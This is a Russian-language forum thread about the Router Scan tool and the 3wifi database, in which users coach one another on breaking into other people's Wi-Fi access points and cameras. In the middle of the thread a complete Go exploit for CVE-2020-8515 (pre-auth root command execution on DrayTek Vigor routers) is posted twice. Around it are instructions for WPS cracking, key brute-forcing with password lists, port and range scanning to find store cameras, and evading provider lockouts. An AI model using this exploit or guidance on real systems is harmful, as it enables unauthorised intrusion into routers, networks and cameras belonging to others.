PS. тоже с Тендой мучаюсь, не растёт с пином, после 10 попыток улетает в лок.
vova2106
05.04.2020, 17:29
Это Tenda, к ним нет генератора WPS пин.
Можешь тут проверять, какой роутер мучаешь.
https://2ip.ua/ru/services/information-service/mac-find
PS. тоже с Тендой мучаюсь, не растёт с пином, после 10 попыток улетает в лок.
А к каким подходит генератор WPS пин?
У меня получается ни к одной не подходит?
Это Tenda
попробуй сбрутить ключь (не пин) роутер сканом со встроеным пасслистом, не поможет, втыкай пасс лист побольше (в соседней теме стас переодически выкладывает выборку паролей с 3wifi) - довольно часто прокатывает (но не всегда)
vova2106
05.04.2020, 20:56
Ещё вот есть проблемка с роутер сканом,когда я вхожу в свою учетную запись в программе,то у меня выдаёт наподобие этого «не установлена связь с 3wifi,сгенерируйте на самом сайте» хотя интернет был в порядке
Ещё вот есть проблемка с роутер сканом,когда я вхожу в свою учетную запись в программе,то у меня выдаёт наподобие этого «не установлена связь с 3wifi,сгенерируйте на самом сайте» хотя интернет был в порядке
В своем кабинете API ключ установил ?
vova2106
05.04.2020, 21:16
В своем кабинете API ключ установил ?
Ничего вроде не устанавливал,подскажите пожалуйста,где это находится?
В программе или на сайте?
1) на сайте кликнуть по своему нику
2) перейдешь Управлением пользователем (твой Ник)
3) найди API ключ ( чтение и запись) , если пусто нажми получить новый
Все ( проверяешь на программе RS - не должно быть ошибок)
vova2106
05.04.2020, 21:37
1) на сайте кликнуть по своему нику
2) перейдешь Управлением пользователем (твой Ник)
3) найди API ключ ( чтение и запись) , если пусто нажми получить новый
Все ( проверяешь на программе RS - не должно быть ошибок)
Спасибо,все помогло
Vikhedgehog
07.04.2020, 03:40
RCE, DrayTek Vigor, CVE-2020-8515
[CODE]
package main
/*
CVE-2020-8515: DrayTek pre-auth remote root RCE
Mon Mar 30 2020 - 0xsha.io
Affected:
DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta,
and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta,
and 1.4.4_Beta
You should upgrade as soon as possible to 1.5.1 firmware or later
This issue has been fixed in Vigor3900/2960/300B v1.5.1.
read more :
https://www.skullarmy.net/2020/01/draytek-unauthenticated-rce-in-draytek.html
https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/
https://thehackernews.com/2020/03/draytek-network-hacking.html
https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/
exploiting using keyPath
POST /cgi-bin/mainfunction.cgi HTTP/1.1
Host: 1.2.3.4
Content-Length: 89
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A %27&loginUser=a&loginPwd=a
*/
import (
"fmt"
"io/ioutil"
"net/http"
"net/url"
"os"
"strings"
)
func usage() {
fmt.Println("CVE-2020-8515 exploit by @0xsha ")
fmt.Println("Usage : " + os.Args[0] + " URL " + "command" )
fmt.Println("E.G : " + os.Args[0] + " http://1.2.3.4 " + "\"uname -a\"" )
}
func main() {
if len(os.Args)
vova2106
07.04.2020, 12:36
RCE, DrayTek Vigor, CVE-2020-8515
package main
/*
CVE-2020-8515: DrayTek pre-auth remote root RCE
Mon Mar 30 2020 - 0xsha.io
Affected:
DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta,
and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta,
and 1.4.4_Beta
You should upgrade as soon as possible to 1.5.1 firmware or later
This issue has been fixed in Vigor3900/2960/300B v1.5.1.
read more :
https://www.skullarmy.net/2020/01/draytek-unauthenticated-rce-in-draytek.html
https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/
https://thehackernews.com/2020/03/draytek-network-hacking.html
https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/
exploiting using keyPath
POST /cgi-bin/mainfunction.cgi HTTP/1.1
Host: 1.2.3.4
Content-Length: 89
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fet c%2fpasswd%0A%27&loginUser=a&loginPwd=a
*/
import (
"fmt"
"io/ioutil"
"net/http"
"net/url"
"os"
"strings"
)
func usage() {
fmt.Println("CVE-2020-8515 exploit by @0xsha ")
fmt.Println("Usage : " + os.Args[0] + " URL " + "command" )
fmt.Println("E.G : " + os.Args[0] + " http://1.2.3.4 " + "\"uname -a\"" )
}
func main() {
if len(os.Args) < 3 {
usage()
os.Exit(-1)
}
targetUrl := os.Args[1]
//cmd := "cat /etc/passwd"
cmd := os.Args[2]
// payload preparation
vulnerableFile := "/cgi-bin/mainfunction.cgi"
// specially crafted CMD
// action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fet c%2fpasswd%0A%27&loginUser=a&loginPwd=a
payload :=`'
/bin/sh -c 'CMD'
'`
payload = strings.ReplaceAll(payload,"CMD", cmd)
bypass := strings.ReplaceAll(payload," ", "${IFS}")
//PostForm call url encoder internally
resp, err := http.PostForm(targetUrl+vulnerableFile ,
url.Values{"action": {"login"}, "keyPath": {bypass} , "loginUser": {"a"}, "loginPwd": {"a"} })
if err != nil{
fmt.Println("error connecting host")
os.Exit(-1)
}
defer resp.Body.Close()
body, err := ioutil.ReadAll(resp.Body)
if err != nil{
fmt.Println("error reading data")
os.Exit(-1)
}
fmt.Println(string(body))
}
Это что?)
Это что?)
в гугле бан словил?
https://www.securitylab.ru/vulnerability/505086.php
Stalker5
07.04.2020, 20:02
Подскажите плиз, как можно найти камеры местных магазинов?
Мб какие-то конкретные диапазоны есть?
Подскажите плиз, как можно найти камеры местных магазинов?
Мб какие-то конкретные диапазоны есть?
у камер нет "конкретных диапозонов", просто сканируй диапозон провайдеров твоего города.
Ребята подскажите решение проблемы подключения к 3wifi service.
В настройках прописал логин и пароль.
Так понимаю доступ закрыт?
2020.03.17
Гостевая учётная запись временно заблокирована, подробнее: https://forum.antichat.ru/posts/4370935
binarymaster
10.04.2020, 16:10
Ребята подскажите решение проблемы подключения к 3wifi service.
Так понимаю доступ закрыт?
Всё так.
Stalker5
12.04.2020, 12:01
у камер нет "конкретных диапозонов", просто сканируй диапозон провайдеров твоего города.
Порты какие лучше?
Порты какие лучше?
80-89, 8000, 8080-8089, 8880-8889 навскидку для веб-интерфейса, но по сути сидеть могут на любом порту
Stalker5
12.04.2020, 15:53
80-89, 8000, 8080-8089, 8880-8889 навскидку для веб-интерфейса, но по сути сидеть могут на любом порту
Спасибо, попробую
Stalker5
12.04.2020, 16:20
Может есть какой-то чат где-то?
В Телеграме в чате забанили непонятно за что
Может есть какой-то чат где-то?
В Телеграме в чате забанили непонятно за что
причина же указывается бана... или ты нажал на /banmepls ?
Stalker5
12.04.2020, 19:39
причина же указывается бана... или ты нажал на /banmepls ?
Вроде не нажимал, а причину не указали - задал вопрос, пост удалили и в бан отправили(
Stalker5
12.04.2020, 19:53
В телеге логин trozik355 , может тут админы чата скажут за что бан дали?
binarymaster
12.04.2020, 19:55
В телеге логин trozik355 , может тут админы чата скажут за что бан дали?
https://t.me/routerscan/132188
[+] Banned trozik355 (правило 1)
Правила группы:
1. Не ругаемся (не используем непристойные выражения — мат, ругательства, и слова на них похожие или завуалированные)
Обычно за единичное нарушение дают мут, а бан только в случае нескольких рецидивов.
Stalker5
12.04.2020, 19:58
Мда, зашёл задал вопрос - дали бан, странно. Ладно фиг с ним
AlexDPNK
13.04.2020, 11:25
Порты какие лучше?
Добавь Dahua (37777)
8000-8003
уязвимость в Huawei HG630 2 Router (пароль по умолчанию последние 8 символов серийного номера)
https://www.exploit-db.com/exploits/48310
видос как заюзать
а не было попыток замутить ReactOS + RouterScan в единое целое для размещения к примеру, на мультибут флешке рядом с остальными полезностями, чтоб с виндой не копошиться?
пробовал ReactOS недавний 0.4.13 на виртуалбох и разного возраста драйвера для популярных реалтек (2870, 5370...) не принимаются осью.
binarymaster
17.04.2020, 03:08
а не было попыток замутить ReactOS + RouterScan в единое целое для размещения к примеру, на мультибут флешке рядом с остальными полезностями, чтоб с виндой не копошиться?
ReactOS ещё не готова к Router Scan, даже если получится сетевые драйверы завести.
а без этого никак?
ну как бы.... если нет удаленного доступа - его нет...
если подбереш пароль от точки и подключишся к ней, то из локальной сети возможно и повезет...
Piligrim740
22.04.2020, 09:47
какой локальная сеть?
Большинство провайдеров прячут точки за NAT, но из локальной сети многие видны.
Для начала, ломаешь точку по WPS.
Потом выясняешь локальную сеть.
Как выяснить локальную сеть ? - в строке поиск набираешь CMD > ентер, далее набиваешь в терминале tracert(пробел)8.8.8.8
Если локальная сеть доступна, во второй - третьей строчке будет что то типа такой строчки 10.10.25.16
Это локалка, вот в ней и нужно потрошить точки.
Забиваешь в роутер скане 10.10.0.0/16 и поехали.
Что то подобное :
https://b.radikal.ru/b01/2004/2d/8cf45f8321f2.jpg
CRACK211
22.04.2020, 10:10
всё равно не взломает наших роутеров я до хуя вставил айпишки вроде: 10.231.20.200/16 10.230.10.16/16 всё равно не взломает ну как-то взломает но от других наших городов Таджикистана
Просеанируйте порты. Вы знаете на каком порту живут эти роутеры ?
Piligrim740
22.04.2020, 10:16
нуу... не знаю на роутер скан вставлен 3порта а надо ещё добавить?
Скачай програмку https://yadi.sk/d/XpuEDMRiKxxeyw
И сканируй порты нужных диапазонов.
CRACK211
22.04.2020, 10:16
нуу... не знаю на роутер скан вставлен 3порта а надо ещё добавить?
Конечно) надо просканировать сети и посмотреть на каком порту веб морда роутера это важно . Может порт не стандартный и поэтому роутер скан не видит роутеры. Просканируйте сеть
Piligrim740
22.04.2020, 10:26
То есть мне надо ещё добавить на роутер скан порты? А какие именно мне добавить чтобы взломать айпишники наших роутеров?
Расписал тебе, как можно выяснить Локальную сеть.
Далее программой (которую скинул) сканишь открытые порты.
Потом в роутер скане, добавляешь нужные порты.
PS. скинь несколько МАС адресов, которые видит Роутер скан.
CRACK211
22.04.2020, 10:26
То есть мне надо ещё добавить на роутер скан порты? А какие именно мне добавить чтобы взломать айпишники наших роутеров?
Прочтите внимательно что я написал .вам надо просканировать вашу сеть программой что выложил Piligrim740 и посмотреть какие порты на этом диапазоне . И эти порты вписать в роутер скан
CRACK211
22.04.2020, 11:41
10.231.27.183/16 помогите вы просканируйте этот диапазон дайте мне порты или сами вы просканирутй этот диапазон на роутер скан и что будет... у меня не получилось)) у меня взломаются только то айпишки которые включены удаленные доступа
Во первых я не буду за вас сканировать . Это уже наглость . Во вторых это ip вашей локальной сети . И если бы даже я захотел это сделать (что вряд-ли) я бы не смог это сделать. Учитесь смотрите видео в ютубу . А если не поймёте как лучше не лезте в эти дела. Вам все по полкам расписали .
stroika93
22.04.2020, 11:59
Подскажите какие порты нужны.
binarymaster
22.04.2020, 17:49
два роутера
Сканируй RS'ом, выгружай в базу, вечером проверю чтоб были.
Westmoudl
23.04.2020, 11:19
Здравствуйте у меня вопрос по router scan, сколько бы сетей я раньше не сканировал я получал сети в городах саратов, москва или ещё где-то лишь бы не в моём городе. Однако недавно я почти нашёл нужные мне диапазоны и нашёл первые 3 точки рядом со мной (ну как, в 2-3 км до них) я могу спокойно дойти и подключиться только вот последующие мои попытки найти точки ближе ко мне опять показывали другие города иногда даже похуже, так что для того, чтобы найти ещё точек поблизости мне надо отсканировать ещё одну или 10 ночей диапазон *.17.50.2-*.255.255.255 и таких штук семь а ведь от *.0.0.0 до *.18.17.1 сканируеться ой как долго я даже сам ждать устал (это за ночь)
Но суть не в этом, как я уже говорил я нашёл три точки, сегодня решил сверить их с 3wifi map но их там нет, а у меня есть. Стоит ли их тогда заливать на карту 3wifi или они какие-то не те ?
Spoiler: 3wifi карта
https://forum.antichat.ru/proxy.php?image=https%3A%2F%2Fcdn1.savepice.ru%2Fu ploads%2F2020%2F4%2F22%2Fe9efe7de4fdbe01f482541742 3697c36-full.jpg&hash=9f5ddd5d507dde705bfbc5c2c5f0c82f
(и да, я проверил все точки поблизости на 3wifi но похожих на мою найденную - нет)
Spoiler: моя карта
https://forum.antichat.ru/proxy.php?image=https%3A%2F%2Fcdn1.savepice.ru%2Fu ploads%2F2020%2F4%2F22%2F5bb09033019d02fa78ffe3538 e57b22d-full.jpg&hash=bea6450e14ef514774baad8bed91a96e
как видим данной точки нету,
Piligrim740
23.04.2020, 12:08
C такими познаниями, в сканирование сетей, пока лучше не углубляться.
Ближайшие точки, какие видит твой комп, пробуй ломать по WPS.
Больше пользы будет.
Благо Router Scan заточен под эти цели на 5+
И побольше конкретики, какой МАС точки, какой оператор ( по возможности ).
Судя по твоему скрину, г.Орёл.
Нам по сути не нужно гадать, какой город, какие операторы связи, какой роутер.
PS. начинай осваивать работу с хендшейками.
Если что-то непонятно, задай вопрос в этой теме : https://forum.antichat.ru/threads/424494/page-290
Тема специально для этого создана.
А здесь ничего интересного нет? Вроде свежее...
https://sploitus.com/exploit?id=PACKETSTORM:156083
https://sploit.tech/2019/12/16/Realtek-TOTOLINK.html
kaliastr2009
27.04.2020, 20:43
Добрый вечер . Проблема заключается в том что при работе RS через почти сразу пропадает интернет на пк и не только где RS но и на всех остальных устройствах в локальной сети . в чем может быть проблема . Проверенно на разных провайдерах .
RS через почти сразу пропадает интернет
Вы жадничаете и запускаете много потоков. Уменьшите в разы и будет нормально.
Или сеть слабенькая - дешманские роутеры не могут долго держать трафик через себя.
kaliastr2009
27.04.2020, 21:34
Вы жадничаете и запускаете много потоков. Уменьшите в разы и будет нормально.
Или сеть слабенькая - дешманские роутеры не могут долго держать трафик через себя.
Запуская RS с настройками по умолчанию. роуртеры в 2 случаях микротики . в 3 провайдерский тплинк) уменьшал до 100 нечего не менялось . есть предположения ?
роуртеры в 2 случаях микротики
Значит не туда залезли. Эти могут блокировать подозрительную нагрузку. Ну и антивирус/файрвол должны так себя вести.
Piligrim740
27.04.2020, 21:44
У меня в регионе, несколько провайдеров лочат сеть, после 1-3 минут сканирования.
Поэтому приходится сканить урывками.
Минута скана - перерыв.
Дальше опять, минута сканирования, опять перерыв.
kaliastr2009
27.04.2020, 21:49
У меня в регионе, несколько провайдеров лочат сеть, после 1-3 минут сканирования.
Поэтому приходится сканить урывками.
Минута скана - перерыв.
Дальше опять, минута сканирования, опять перерыв.
Не это не провайдер . так как RS в это время работает отлично и находит все что и должен находить . только инет пропадает в локальных сетях
kaliastr2009
27.04.2020, 21:52
Значит не туда залезли. Эти могут блокировать подозрительную нагрузку. Ну и антивирус/файрвол должны так себя вести.
Ативирус и файрвол отключены . микротики не повисают . к ним из вне доступ есть . такое ощущение что RS мультикаст в локальную сеть рассылает . Так называемый шторм мультикаста устраивает .
Triton_Mgn
27.04.2020, 21:53
Не это не ровайдер . так как RS в это время работает отлично и находит все что и должен находить . только инет пропадает в локальных сетях
Уменьшай потоки дальше, попробуй 10 или 5.
У меня в регионе, несколько провайдеров лочат сеть, после 1-3 минут сканирования.
Поэтому приходится сканить урывками.
Минута скана - перерыв.
Дальше опять, минута сканирования, опять перерыв.
автоматизировать регулируемую (по примеру работы с reaver'ом) паузу в скане было б полезно в любом регионе
binarymaster
28.04.2020, 01:02
автоматизировать регулируемую (по примеру работы с reaver'ом) паузу в скане было б полезно в любом регионе
Для этого функция Watchdog есть, читайте документацию, смотрите настройки.
Этот exploit можно добавить или от него толку в программе не будет?
binarymaster
28.04.2020, 16:55
Но при нажатие на юзер мануал рашен открываться блокнот с текстом
Я не виноват, что в вашей системе блокнот назначен программой по умолчанию для открытия файлов HTML.
Triton_Mgn
28.04.2020, 20:27
Может не заметили...
Это лечится?
В нужном диапазоне в основном похожие роутеры, и много "Status: Can't load page".
Надо прочитать документацию, и да лечится, с нормальной головы - на хорошую
Надо прочитать документацию, и да лечится, с нормальной головы - на хорошую
Прежде чем писать, перечитал всю, включил логи.
Судя по рейтингу, должны знать что говорите, перечитаю ещё раз.
voktorsmirnov20
28.04.2020, 21:25
подскажите пин код для тд:
BSSID: 04:95:E6:BB:8F:01
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot